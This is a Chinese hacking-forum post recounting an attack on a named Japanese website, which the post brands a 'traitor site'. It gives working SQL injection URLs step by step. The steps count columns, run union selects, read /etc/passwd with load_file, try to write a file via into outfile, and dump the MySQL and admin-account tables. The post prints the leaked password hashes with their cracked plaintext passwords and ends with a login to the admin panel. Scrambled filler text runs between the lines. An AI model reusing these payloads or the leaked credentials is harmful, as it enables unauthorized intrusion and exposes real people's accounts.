原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

8 r! _4 K) w' S6 M+ g; ~* l$ q
* h& \$ k$ S, `% E" Q% U6 p" p0x01. 检测 www.zuaa.jp 收集数据
- q3 F* _' b$ B/ }; m' ]5 ?: h
1 }0 J& H" U3 I% f4 |5 T6 P4 I
whatweb


利用NMAP扫描
9 @: p1 R6 o* \5 K, o$ P' P' M2 }5 c% a
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


/ G. t( l. U+ O# l0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常
+ ~# y" Y# I1 I, o6 T; F
4 o1 o$ n% x& ^0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

% _/ C1 y4 E$ s5 I8 I+ A3 j9 Q0 v4 g0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

) L5 U3 Q* r0 x: Q* y3 Uuser:            root@localhost
' |0 h0 n4 P( t( Jdatabase:    openpne
" J, M$ N9 P5 t. Eversion:      4.1.22
& T  Y4 i1 k6 W. Zos:             portbld-freebsd5.4

( l1 R, B2 U) A0 r- Q( v0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( n% a0 B% u# |* W. U: K' Z3 _  o& ~
  x" {4 P% V7 f9 W, P# N6 G通过工具转换
5 n8 K+ S2 i$ A. h
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 E3 V4 t3 J9 ]
0x07. 利用 into outfile
全部都失败
- z* s4 E2 q7 ~, m* t$ zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
4 n9 g7 C# F) ], }6 i' L
) _3 C6 m- c% W- q/ J9 n; E* ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
+ s' m: \4 w( W& B, W
$ s* {! w; s: S( r! Y页面显示“MDB2 Error:syntax error”

5 d3 U2 Z) @# D5 o3 f0x08. 利用 mysql 4.1
) X- B0 G$ c4 \& F猜常规表名，字段未果 工具 sqlmap
; \7 E- o' z" @1 B中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
+ }+ g. e/ J& P; s0 s


0x09. 查找后台
/ A1 D' K* y. B! N$ K1 N, g* @2 c利用 现有的各种 后台工具尝试都不行
$ j5 D# D5 H4 S5 H4 z/ x
1 O+ [' p  L. g, a6 p- M0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
+ W7 {3 T, H8 E7 c可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
6 N6 A3 Y3 R9 p
这个可以在 www.cmd5.com 解密
% h) ^( Q; S& w! Kroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
' g& i0 T' b! B3 Q! Wopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
# B- k4 ^$ u5 _. K  G  ?zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

/ M9 m/ T& |9 f2 r
5 U4 x9 q' X3 B# n0 d: P+ }; n% J0x11. 网站突破
. P: M9 p! S' w( X7 G发现网站的源程序 openpne, google 下载 openpne 源码
8 }0 z! L- k5 t3 N  [  U' Z; X5 A
# p% M! z8 Z: O: p. u
# M1 d5 f( V" [( P' f+ @% U0x12. 默认信息利用
) [+ ?( y/ }8 thttp://sns.zuaa.jp/?m=admin&a=page_login
( j) L. ~( H) W
2 l+ v0 R; H, e表名 (c_admin_user) ，字段名（username,password）
2 \) T5 r' U' ^! q6 Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
( t. s8 I; w7 y
" c7 C! {7 |2 J6 J& x- U解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
8 F0 j+ n$ e4 Izuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

3 p  b& k: F. X5 R% H$ f4 x/ {0x13. 登录后台



* H- `; M2 M3 c0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
& E# p* y6 C, ~------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
- F, g2 t$ O: @/ ~中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
$ g7 J& \, D6 }1 Q/ r. V: t
5 @* C, v! q) l7 G最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
0 v, c5 K( B4 H: s/ |; Z" }. D

荒村狂客

哪个牛人 费的这劲 入侵的